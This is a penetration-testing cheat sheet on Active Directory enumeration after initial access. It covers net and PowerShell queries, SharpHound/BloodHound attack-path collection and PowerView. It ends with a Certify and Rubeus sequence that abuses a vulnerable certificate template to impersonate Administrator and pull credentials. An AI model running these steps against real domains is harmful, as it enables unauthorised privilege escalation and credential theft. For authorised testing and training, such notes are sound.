# Enumerate Active Directory Enumeration following after initial credentials are gained ## SYSVOL * On windows use `runas` and gain local administrative permissions via ```sh runas.exe /netonly /user:%FQDNORNETBIOSDOMAIN%\%USERNAME% cmd.exe ``` * Check validity of credentials against `SYSVOL`, it stores __Group Policy Objects (GPO)__. Every AD account will gain access * Query DNS, for example the DC ```sh $dnsip = "" $index = Get-NetAdapter -Name '' | Select-Object -ExpandProperty 'ifIndex' Set-DnsClientServerAddress -InterfaceIndex $index -ServerAddresses $dnsip ``` * Check `SYSVOL` afterwards via `hostname` to verify via Kerberos auth ```sh dir \\%HOSTNAME%\SYSVOL\ ``` * Check `SYSVOL` via `IP` address to force `NTLM` authentication ## Microsoft Management Console (MMC) * Use AD Snap-ins of `Remote Server Administrative Tools` * Start -> Apps & Features -> Manage Optional Features -> Add a feature -> Search `RSAT` -> Select `RSAT: Active Directory Domain Services and Lightweight Directory Tools` -> Install * `Win` + `r` -> `MMC` -> File -> Add/Remove Snap-in -> add 3 AD feature snap-ins -> right click `Active Directory Sites and Services` -> `Change Forest` -> Add root domain -> right click `Active Directory Users and Computers` -> Change Domain -> enter root domain -> right click `Active Directory Users and Computers ` -> View -> Advanced Features * Start enumerating via click on the domain object in the tree on the left * Take a look at `People` directory -> right click on them to see properties * Change or create user or change groups * Also use `MMC` to enumerate ## CMD enumeration Execute from domain joined machine * Users ```sh net user /domain ``` * Specific user ```sh net user /domain ``` * Groups ```sh net group /domain ``` * Specific group ```sh net group /domain ``` * Password Policy via accounts ```sh net accounts /domain ``` ## Powershell Cmdlets * User details via ```sh Get-ADUser -Identity -Server -Properties * ``` * Groups ```sh Get-ADGroup -Identity Administrators -Server exampleDC.com -Properties * ``` * Group membership ```sh Get-ADGroupMember -Identity Administrators -Server exampleDC.com ``` * Generic AD objects ```sh Get-ADObject -Filter -includeDeletedObjects -Server exampleDC.com Get-ADObject -Filter 'badPwdCount -gt 0' -Server exampleDC.com ``` * Domains ```sh Get-ADDomain -Server exampleDC.com ``` ## Sharphound and Bloodhound * [BloodHound documentation](https://bloodhound.readthedocs.io/en/latest/index.html#) * Change to AD user via `runas.exe` and collect via one of the following * Sharphound.ps1 * sharphound.exe * Azurehound.ps1 * For example ```sh Sharphound.exe --CollectionMethods --Domain example.com --ExcludeDCs ``` * After some time collect the current sessions via ```sh Sharphound.exe --CollectionMethods Session --Domain example.com --ExcludeDCs ``` * Start neo4j db ```sh neo4j console start ``` * Start bloodhound ```sh bloodhound --no-sandbox ``` * Drag and Drop the zip file from Sharphound * Either search for AD objects and use `Analysis` to find an attack path through the info on the edges * Shows exploitable accounts in the `Analysis` tab, for example kerberroastable accounts ## LDAP ## PowerView Registered Machines in the domain ```sh Get-NetComputer | select "name" ``` When the computers were added to the domain ```sh Get-ADComputer -filter * -properties whencreated | Select Name,@{n="Owner";e={(Get-acl "ad:\$($_.distinguishedname)").owner}},whencreated ``` ## WMI ## Find Certifications and Private Keys Certification Services can be found with [the Certify tool](https://github.com/GhostPack/Certify.git). * Enumerate vunerabilities on the current user via Certify, use `FullName` found in the first step to insert domain in the second step ```sh Certify.exe find /vulnerable /currentuser .\Certify.exe request /ca:$FULL_NAME /template:UserAuthentication /altname:Administrator ``` * Copy the found key and convert it like mentioned in the last line of the ouptut, for example ```sh openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx ``` * Get ticket with the the loot via Rubeus ``` .\Rubeus.exe asktgt /user:Administrator /certificate:cert.pfx /getcredentials ```